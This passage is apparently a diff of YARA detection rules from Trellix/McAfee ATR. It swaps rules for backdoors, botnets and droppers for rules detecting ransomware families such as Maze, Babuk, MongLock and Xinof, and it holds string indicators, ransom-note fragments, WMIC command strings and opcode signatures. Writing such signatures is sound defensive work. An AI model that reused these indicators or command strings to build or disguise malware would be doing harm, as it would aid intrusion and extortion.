?? ?? ?? ?? 8B ?? ?? 2B ?? 8B ?? 4? 5? 8B ?? ?? 8B ?? 83 ?? ?? B9 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 0F 8C } condition: - uint16(0)==0x5a4d and filesize <440KB and any of them + uint16(0)==0x5a4d and all of them } -rule TRELLIX_ARC_Vpnfilter : BACKDOOR FILE +rule TRELLIX_ARC_Ransom_Maze : RANSOMWARE FILE { meta: - description = "Filter for 2nd stage malware used in VPNfilter attack" - author = "Christiaan Beek @ McAfee Advanced Threat Research" - id = "89bd7f94-d73c-5c5c-a3ec-0331f79e61fd" - date = "2018-05-23" - modified = "2020-08-14" - reference = "https://blog.talosintelligence.com/2018/05/VPNFilter.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_VPNfilter.yar#L1-L40" + description = "Detecting MAZE Ransomware" + author = "McAfee ATR" + id = "098a93c4-9aab-5563-af17-7aa91b056f64" + date = "2020-04-19" + modified = "2020-10-12" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Maze.yar#L1-L39" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387" - logic_hash = "88f08765dff632f0c08e985181309e5c3ac9cdaa51d05d8485c411fb1a183cca" + hash = "5badaf28bde6dcf77448b919e2290f95cd8d4e709ef2d699aae21f7bae68a76c" + logic_hash = "fc16475fbc2a2acf5d053ded4d2ec4126c6d6dcac3a6eafadcd6c61419dd7594" score = 75 - quality = 70 - tags = "BACKDOOR, FILE" + quality = 68 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/VPNfilter" + malware_type = "ransomware" + malware_family = "Ransom:W32/Maze" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "id-at-postalAddress" fullword ascii - $s2 = "/bin/shell" fullword ascii - $s3 = "/DZrtenNLQNiTrM9AM+vdqBpVoNq0qjU51Bx5rU2BXcFbXvI5MT9TNUhXwIDAQAB" fullword ascii - $s4 = "Usage does not match the keyUsage extension" fullword ascii - $s5 = "id-at-postalCode" fullword ascii - $s6 = "vTeY4KZMaUrveEel5tWZC94RSMKgxR6cyE1nBXyTQnDOGbfpNNgBKxyKbINWoOJU" fullword ascii - $s7 = "id-ce-extKeyUsage" fullword ascii - $s8 = "/f8wYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNV" fullword ascii - $s9 = "/etc/config/hosts" fullword ascii - $s10 = "%s%-18s: %d bits" fullword ascii - $s11 = "id-ce-keyUsage" fullword ascii - $s12 = "Machine is not on the network" fullword ascii - $s13 = "No XENIX semaphores available" fullword ascii - $s14 = "No CSI structure available" fullword ascii - $s15 = "Name not unique on network" fullword ascii + $x1 = "process call create \"cmd /c start %s\"" fullword wide + $s1 = "%spagefile.sys" fullword wide + $s2 = "%sswapfile.sys" fullword wide + $s3 = "%shiberfil.sys" fullword wide + $s4 = "\\wbem\\wmic.exe" fullword wide + $s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii + $s6 = "NO MUTEX | " fullword wide + $s7 = "--nomutex" fullword wide + $s8 = ".Logging enabled | Maze" fullword wide + $s9 = "DECRYPT-FILES.txt" fullword wide + $op0 = { 85 db 0f 85 07 ff ff ff 31 c0 44 44 44 44 5e 5f } + $op1 = { 66 90 89 df 39 ef 89 fb 0f 85 64 ff ff ff eb 5a } + $op2 = { 56 e8 34 ca ff ff 83 c4 08 55 e8 0b ca ff ff 83 } condition: - ( uint16(0)==0x457f and filesize <500KB and (8 of them )) or ( all of them ) + ( uint16(0)==0x5a4d and filesize <500KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) } -rule TRELLIX_ARC_Chikdos_Malware_Pdb : DOS FILE +rule TRELLIX_ARC_Anatova_Ransomware : RANSOMWARE FILE { meta: - description = "Chikdos PDB" + description = "Rule to detect the Anatova Ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "0174ff2b-57fc-5578-b45e-c08bf8528ee8" - date = "2013-12-02" + id = "6e3205aa-42e4-5449-877e-37494cdd096b" + date = "2019-01-22" modified = "2020-08-14" - reference = "http://hackermedicine.com/tag/trojan-chickdos/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_chickdos_pdb.yar#L1-L25" + reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Anatova.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "c2a0e9f8e880ac22098d550a74940b1d81bc9fda06cebcf67f74782e55e9d9cc" - logic_hash = "150bf809a61aad00df0c49fb6a609b909c84ffb9ca442e143a6c5bf3dfc39314" + hash = "97fb79ca6fc5d24384bf5ae3d01bf5e77f1d2c0716968681e79c097a7d95fb93" + logic_hash = "4fce15ad0ef2d3cb39f6092677f117308f847815cb2a5a491290a1f9d09776df" score = 75 quality = 70 - tags = "DOS, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "dos" - malware_family = "Dos:W32/ChickDos" + malware_type = "ransomware" + malware_family = "Ransom:W32/Anatova" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb" + $regex = /anatova[0-9]@tutanota.com/ condition: - uint16(0)==0x5a4d and filesize <600KB and any of them + uint16(0)==0x5a4d and filesize <2000KB and $regex } -rule TRELLIX_ARC_MALW_Emotet : FINANCIAL FILE +rule TRELLIX_ARC_Backdoorfckg : CTB_LOCKER_RANSOMWARE RANSOMWARE { meta: - description = "Rule to detect unpacked Emotet" - author = "Marc Rivero | McAfee ATR Team" - id = "5bc83065-dfdd-56b7-9983-200bff35c8b1" - date = "2020-07-21" + description = "CTB_Locker" + author = "ISG" + id = "2a00551d-1f80-5991-9416-d9b1b39db8e9" + date = "2015-01-20" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_emotet.yar#L1-L32" + reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_CTBLocker.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "223e4453a6c3b56b0bc0f91147fa55ea59582d64b8a5c08f1f8d06026044065e" + logic_hash = "a334b07053db66aa0fb2d2b2ca7f94c480509041724ddd4dd1708052d75baffb" score = 75 - quality = 70 - tags = "FINANCIAL, FILE" + quality = 20 + tags = "CTB_LOCKER_RANSOMWARE, RANSOMWARE" rule_version = "v1" - malware_type = "financial" - malware_family = "Backdoor:W32/Emotet" - actor_type = "Cybercrime" - hash1 = "a6621c093047446e0e8ae104769af93a5a8ed147ab8865afaafbbd22adbd052d" + malware_type = "ransomware" + malware_family = "Ransom:W32/CTBLocker" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pattern_0 = { 8b45fc 8be5 5d c3 55 8bec } - $pattern_1 = { 3c39 7e13 3c61 7c04 3c7a 7e0b 3c41 } - $pattern_2 = { 7c04 3c39 7e13 3c61 7c04 3c7a 7e0b } - $pattern_3 = { 5f 8bc6 5e 5b 8be5 } - $pattern_4 = { 5f 668906 5e 5b } - $pattern_5 = { 3c30 7c04 3c39 7e13 3c61 7c04 } - $pattern_6 = { 53 56 57 8bfa 8bf1 } - $pattern_7 = { 3c39 7e13 3c61 7c04 3c7a 7e0b } - $pattern_8 = { 55 8bec 83ec14 53 } - $pattern_9 = { 5e 8be5 5d c3 55 8bec } + $string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + $stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + $string2 = "keme132.DLL" + $string3 = "klospad.pdb" condition: - 7 of them and filesize <180224 + 3 of them } -rule TRELLIX_ARC_Malw_Medfos : TROJAN FILE +rule TRELLIX_ARC_Ransom_Monglock : RANSOMWARE FILE { meta: - description = "Rule to detect Medfos trojan based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "07ad0227-ca8f-5071-8ef7-8c3e087fcc35" - date = "2013-04-19" + description = "Ransomware encrypting Mongo Databases " + author = "Christiaan Beek - McAfee ATR team" + id = "4350a874-dd76-5379-af9f-f1d190385706" + date = "2019-04-25" modified = "2020-08-14" - reference = "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=win32%2Fmedfos" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_medfos_pdb.yar#L1-L25" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_MONGOLOCK.yar#L1-L41" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "3582e242f62598445ca297c389cae532613afccf48b16e9c1dcf1bfedaa6e14f" - logic_hash = "1726462a806f5cb3f0b80596623cebc51a7a9f866ded0cb59ea1c43034ce2819" + logic_hash = "245a7377a410828ed8bc7148f36af6d143ad20d16840238ed5b6d6f94f015984" score = 75 quality = 70 - tags = "TROJAN, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/Medfos" + malware_type = "ransomware" + malware_family = "Ransom:W32/MongLock" actor_type = "Cybercrime" actor_group = "Unknown" + hash5 = "c4de2d485ec862b308d00face6b98a7801ce4329a8fc10c63cf695af537194a8" strings: - $pdb = "\\som\\bytguqne\\jzexsaf\\gyin.pdb" + $x1 = "C:\\Windows\\system32\\cmd.exe" fullword wide + $s1 = "and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! " fullword ascii + $s2 = "Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.1 BTC to our BitCoin" ascii + $s3 = "No valid port number in connect to host string (%s)" fullword ascii + $s4 = "SOCKS4%s: connecting to HTTP proxy %s port %d" fullword ascii + $s5 = "# https://curl.haxx.se/docs/http-cookies.html" fullword ascii + $s6 = "Connection closure while negotiating auth (HTTP 1.0?)" fullword ascii + $s7 = "detail may be available in the Windows System event log." fullword ascii + $s8 = "Found bundle for host %s: %p [%s]" fullword ascii + $s9 = "No valid port number in proxy string (%s)" fullword ascii + $op0 = { 50 8d 85 78 f6 ff ff 50 ff b5 70 f6 ff ff ff 15 } + $op1 = { 83 fb 01 75 45 83 7e 14 08 72 34 8b 0e 66 8b 45 } + $op2 = { c7 41 0c df ff ff ff c7 41 10 } condition: - uint16(0)==0x5a4d and filesize <150KB and any of them + ( uint16(0)==0x5a4d and filesize <2000KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) } -rule TRELLIX_ARC_Msworldexploit_Builder_Doc : MALDOC FILE +rule TRELLIX_ARC_RANSOM_Babuk_Packed_Feb2021 : RANSOM T1027_005 T1027 T1083 T1082 T1059 T1129 FILE { meta: - description = "Rule to detect RTF/Docs files created by MsWordExploit Builder" - author = "Marc Rivero | McAfee ATR Team" - id = "6c4c091b-5fce-583a-bc17-31830251892c" - date = "2024-09-01" - modified = "2020-08-14" + description = "Rule to detect Babuk Locker packed" + author = "McAfee ATR" + id = "f5f3a3a6-2531-56c4-9153-b698c7bdc3d3" + date = "2021-02-19" + modified = "2021-02-24" reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_MsWordExploit_DOC.yar#L1-L24" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Babuk_Packed_Feb2021.yar#L1-L30" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "f85c6d79e5ed20084d35f9de92a9d9ce20cf4b3100b1226d64147e366934585d" + hash = "48e0f7d87fe74a2b61c74f0d32e6a8a5" + logic_hash = "f3312b9c9147e9f892dbfb329cb95d3ee3ae67eefeec2d089b8c89fd26531953" score = 75 - quality = 68 - tags = "MALDOC, FILE" - malware_type = "maldoc" - malware_family = "Maldoc:W32/MSwordExploit" - actor_type = "Cybercrime" - actor_group = "Unknown" + quality = 70 + tags = "RANSOM, T1027.005, T1027, T1083, T1082, T1059, T1129, FILE" + rule_version = "v1" + malware_family = "Ransom:Win/Babuk" + malware_type = "Ransom" + mitre_attack = "T1027.005, T1027, T1083, T1082, T1059, T1129" strings: - $s1 = { 68 74 74 70 3A 2F 2F 61 70 69 2E 6D 73 77 6F 72 64 65 78 70 6C 6F 69 74 2E 63 6F 6D } - $s2 = "{\\*\\generator mswordexploit 6.3.9600}" fullword ascii + $first_stage1 = { 81 ec 30 04 00 00 68 6c 49 43 00 ff 15 74 20 43 00 a3 60 4e f8 02 b8 db d9 2b 00 ba c5 62 8e 76 b9 35 11 5f 39 eb 09 8d a4 24 00 00 00 00 8b ff 89 14 24 89 4c 24 04 81 04 24 25 10 a3 3b 81 04 24 cf e0 fb 07 81 04 24 35 26 9f 42 81 04 24 65 2b 39 06 81 04 24 3c 37 33 5b 81 44 24 04 48 4f c2 5d 83 e8 01 c7 05 54 4e f8 02 00 00 00 00 75 bf 8b 0d 54 aa 43 00 53 8b 1d 58 20 43 00 55 8b 2d 60 20 43 00 56 81 c1 01 24 0a 00 57 8b 3d 50 20 43 00 89 0d 64 4e f8 02 33 f6 eb 03 8d 49 00 81 f9 fc 00 00 00 75 08 6a 00 ff 15 40 20 43 00 6a 00 ff d7 8b 0d 64 4e f8 02 81 f9 7c 0e 00 00 75 19 6a 00 ff d3 6a 00 6a 00 8d 44 24 48 50 6a 00 6a 00 ff d5 8b 0d 64 4e f8 02 81 fe e5 84 c1 09 7e 0a 81 7c 24 2c 0f 11 00 00 75 12 46 8b c6 99 83 fa 14 7c aa 7f 07 3d 30 c1 cf c7 72 a1 51 6a 00 ff 15 2c 20 43 00 8b 0d 08 a4 43 00 33 f6 a3 f4 31 f8 02 89 0d f4 07 fb 02 39 35 64 4e f8 02 76 10 8b c6 e8 56 e4 ff ff 46 3b 35 64 4e f8 02 72 f0 8b 35 80 20 43 00 bf f0 72 e9 00 8b ff 81 3d 64 4e f8 02 4d 09 00 00 75 04 6a 00 ff d6 83 ef 01 75 eb e8 d6 e3 ff ff e8 11 fe ff ff e8 0c e4 ff ff 5f 5e 5d 33 c0 5b 81 c4 30 04 00 00 c3 } + $first_stage2 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????eb??891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????75??8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6eb??81??????????75??6a??ff??????????6a??ffd78b??????????81??????????75??6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????7e??817c242c0f11????75??468bc69983????7c??7f??3d????????72??516a??ff??????????8b??????????33f6a3????????89??????????39??????????76??8bc6e8????????463b??????????72??8b??????????bf????????8bff81??????????????????75??6a??ffd683ef0175??e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3} + $first_stage3 = {81ec3??4????68????????ff??????????a3????????b8????????ba????????b9????????[2-6]891424894c240481????????????81????????????81????????????81????????????81????????????81??????????????83e801c7??????????????????[2-6]8b??????????538b??????????558b??????????5681??????????578b??????????89??????????33f6[2-6]81??????????[2-6]6a??ff??????????6a??ffd78b??????????81??????????[2-6]6a??ffd36a??6a??8d442448506a??6a??ffd58b??????????81??????????[2-6]817c242c0f11????[2-6]468bc69983????[2-6][2-6]3d????????[2-6]516a??ff??????????8b??????????33f6a3????????89??????????39??????????[2-6]8bc6e8????????463b??????????[2-6]8b??????????bf????????8bff81??????????????????[2-6]6a??ffd683ef01[2-6]e8????????e8????????e8????????5f5e5d33c05b81c43??4????c3} + $first_stage4 = { 81 EC 30 04 00 00 68 6C 49 43 00 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? B8 DB D9 2B 00 BA C5 62 8E 76 B9 35 11 5F 39 EB ?? 8D A4 24 ?? ?? ?? ?? 8B FF 89 14 24 89 4C 24 ?? 81 04 24 25 10 A3 3B 81 04 24 CF E0 FB 07 81 04 24 35 26 9F 42 81 04 24 65 2B 39 06 81 04 24 3C 37 33 5B 81 44 24 ?? 48 4F C2 5D 83 E8 01 C7 05 ?? ?? ?? ?? 00 00 00 00 75 ?? 8B 0D ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 55 8B 2D ?? ?? ?? ?? 56 81 C1 01 24 0A 00 57 8B 3D ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 33 F6 EB ?? 8D 49 ?? 81 F9 FC 00 00 00 75 ?? 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 0D ?? ?? ?? ?? 81 F9 7C 0E 00 00 75 ?? 6A 00 FF D3 6A 00 6A 00 8D 44 24 ?? 50 6A 00 6A 00 FF D5 8B 0D ?? ?? ?? ?? 81 FE E5 84 C1 09 7E ?? 81 7C 24 ?? 0F 11 00 00 75 ?? 46 8B C6 99 83 FA 14 7C ?? 7F ?? 3D 30 C1 CF C7 72 ?? 51 6A 00 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 33 F6 A3 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? 39 35 ?? ?? ?? ?? 76 ?? 8B C6 E8 ?? ?? ?? ?? 46 3B 35 ?? ?? ?? ?? 72 ?? 8B 35 ?? ?? ?? ?? BF F0 72 E9 00 8B FF 81 3D ?? ?? ?? ?? 4D 09 00 00 75 ?? 6A 00 FF D6 83 EF 01 75 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 81 C4 30 04 00 00 C3} + $files_encryption1 = { 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 20 81 40 00 } + $files_encryption2 = {8a4602c1e90288470283ee0283ef0283????72??fdf3a5fcff????????????} + $files_encryption3 = { 8A 46 ?? C1 E9 02 88 47 ?? 83 EE 02 83 EF 02 83 F9 08 72 ?? FD F3 A5 FC FF 24 95 ?? ?? ?? ??} condition: - uint16(0)==0x3030 and filesize <4000KB and any of them + filesize <=300KB and any of ($first_stage*) and any of ($files_encryption*) } -rule TRELLIX_ARC_Downloader_Darkmegi_Pdb : DOWNLOADER FILE +rule TRELLIX_ARC_Ransom_Xinof : RANSOMWARE FILE { meta: - description = "Rule to detect DarkMegi downloader based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "3ccc3685-e05b-5620-9198-24733fb1e7eb" - date = "2013-03-06" - modified = "2020-08-14" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_downloader_darkmegi.yar#L1-L25" + description = "Detect Xinof ransomware" + author = "Thomas Roccia | McAfee ATR team" + id = "3b064ce4-cd5b-5a4a-bb55-a2c2c361791e" + date = "2020-11-20" + modified = "2020-11-20" + reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_xinof.yar#L53-L82" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "bf849b1e8f170142176d2a3b4f0f34b40c16d0870833569824809b5c65b99fc1" - logic_hash = "47faf8c5296e651f82726a6e8a7843dfa0f98e7be7257d2c03efcff550f52140" + hash = "0c1e6299a2392239dbe7fead33ef4146" + logic_hash = "42110ee8869d56c53dc201cbc83652c6457541b8d502aa12b37ef6200e735a15" score = 75 quality = 70 - tags = "DOWNLOADER, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "downloader" - malware_family = "Downloader:W32/DarkMegi" + malware_type = "ransomware" + malware_family = "Ransom/XINOF" actor_type = "Cybercrime" - actor_group = "Unknown" + actor_group = "FONIX" strings: - $pdb = "\\RKTDOW~1\\RKTDRI~1\\RKTDRI~1\\objchk\\i386\\RktDriver.pdb" + $s1 = "XINOF.exe" nocase ascii + $s2 = "C:\\Users\\Phoenix" nocase ascii + $s3 = "How To Decrypt Files.hta" nocase ascii + $s4 = "C:\\ProgramData\\norunanyway" nocase ascii + $s5 = "C:\\ProgramData\\clast" nocase ascii + $s6 = "fonix1" nocase ascii + $s7 = "C:\\Windows\\System32\\shatdown.exe" nocase ascii + $s8 = "XINOF Ransomw" nocase ascii + $s9 = "XINOF v4.2" nocase ascii + $s10 = "XINOF Ransomware Version 3.3" nocase ascii condition: - uint16(0)==0x5a4d and filesize >20000KB and any of them + uint16(0)==0x5a4d and filesize <2000KB and 5 of ($s*) or TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE } -rule TRELLIX_ARC_Festi_Botnet_Pdb : BOTNET FILE +rule TRELLIX_ARC_Installer_Coronavirus : RANSOMWARE FILE { meta: - description = "Rule to detect the Festi botnet based on PDB" + description = "Rule to detect the Corona Virus Installer" author = "Marc Rivero | McAfee ATR Team" - id = "02f4149d-b8ac-5852-8cbe-c47f4cddcba6" - date = "2013-03-04" + id = "2a224529-bfc7-57ed-91c3-426cae4b7895" + date = "2020-03-25" modified = "2020-08-14" - reference = "https://www.welivesecurity.com/2012/05/11/king-of-spam-festi-botnet-analysis/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_festi_botnet_pdb.yar#L1-L25" + reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_coronavirus.yar#L1-L41" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "e55913523f5ae67593681ecb28d0fa1accee6739fdc3d52860615e1bc70dcb99" - logic_hash = "46e2576900fe94d614a683d4f09079b7ac78654079b2e558d076bcb42db4bf11" + hash = "5987a6e42c3412086b7c9067dc25f1aaa659b2b123581899e9df92cb7907a3ed" + logic_hash = "26be8bbfbf615967cc2a0e2d4179cd5f444c53f170a681d2ec236244881dc629" score = 75 - quality = 70 - tags = "BOTNET, FILE" + quality = 62 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "botnet" - malware_family = "Botnet:W32/Festi" + malware_type = "ransomware" + malware_family = "Ransom:W32/CoronaVirus" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\eclipse\\botnet\\drivers\\Bin\\i386\\kernel.pdb" + $s1 = { 61 63 68 65 6C 6C 69 65 73 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D } + $s2 = { 74 6F 6A 65 6E 2E 6D 65 40 67 6D 61 69 6C 2E 63 6F 6D } + $s4 = { 77 61 6E 67 63 68 79 7A 40 67 6D 61 69 6C 2E 63 6F 6D } + $s5 = { 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 74 00 69 00 70 00 6F 00 73 00 20 00 64 00 65 00 20 00 69 00 6D 00 61 00 67 00 65 00 6E 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 3B 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 77 00 6D 00 66 00 7C 00 4D 00 61 00 70 00 61 00 73 00 20 00 64 00 65 00 20 00 62 00 69 00 74 00 73 00 20 00 28 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 29 00 7C 00 2A 00 2E 00 62 00 6D 00 70 00 3B 00 2A 00 2E 00 64 00 69 00 62 00 7C 00 49 00 63 00 6F 00 6E 00 6F 00 73 00 2F 00 63 00 75 00 72 00 73 00 6F 00 72 00 65 00 73 00 20 00 28 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 29 00 7C 00 2A 00 2E 00 69 00 63 00 6F 00 3B 00 2A 00 2E 00 63 00 75 00 72 00 7C 00 4D 00 65 00 74 00 61 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 29 00 7C 00 2A 00 2E 00 77 00 6D 00 66 00 3B 00 2A 00 2E 00 65 00 6D 00 66 00 7C 00 54 00 6F 00 64 00 6F 00 73 00 20 00 6C 00 6F 00 73 00 20 00 61 00 72 00 63 00 68 00 69 00 76 00 6F 00 73 00 20 00 28 00 2A 00 2E 00 2A 00 29 00 7C 00 2A 00 2E 00 2A 00 7C 00 7C 00 } + $s6 = { 48 00 54 00 4D 00 4C 00 5F 00 49 00 4D 00 47 00 23 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 4C 00 49 00 5F 00 43 00 41 00 50 00 54 00 49 00 4F 00 4E 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 29 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 53 00 42 00 5F 00 48 00 5F 00 53 00 43 00 52 00 4F 00 4C 00 4C 00 5F 00 50 00 52 00 45 00 56 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 31 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 4F 00 52 00 41 00 4E 00 47 00 45 00 5F 00 43 00 4C 00 4F 00 53 00 45 00 5F 00 50 00 4E 00 47 00 32 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 50 00 41 00 49 00 44 00 5F 00 53 00 45 00 54 00 54 00 49 00 4E 00 47 00 53 00 5F 00 50 00 4E 00 47 00 } + $s7 = { 25 73 5C 6C 6F 67 5F 25 30 34 64 25 30 32 64 25 30 32 64 5F 25 64 2E 6C 6F 67 } condition: - uint16(0)==0x5a4d and filesize <80KB and any of them + uint16(0)==0x5a4d and filesize <3000KB and all of them } -rule TRELLIX_ARC_Dropper_Demekaf_Pdb : DROPPER FILE +rule TRELLIX_ARC_Ransomware_Coronavirus : RANSOMWARE FILE { meta: - description = "Rule to detect Demekaf dropper based on PDB" + description = "Rule to detect the Corona Virus ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "b49f42c1-d737-5afa-b547-7268e4cde360" - date = "2011-03-26" + id = "4195a57b-cd51-5050-861a-6436f7ec4eca" + date = "2020-03-25" modified = "2020-08-14" - reference = "https://v.virscan.org/Trojan-Dropper.Win32.Demekaf.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_dropper_demekaf_pdb.yar#L1-L25" + reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_coronavirus.yar#L43-L80" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "fab320fceb38ba2c5398debdc828a413a41672ce9745afc0d348a0e96c5de56e" - logic_hash = "89c0c1da1f8997b12a446c93bbde200e62fac9cab2a9a17147b268d435bdc3b6" + hash = "3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3" + logic_hash = 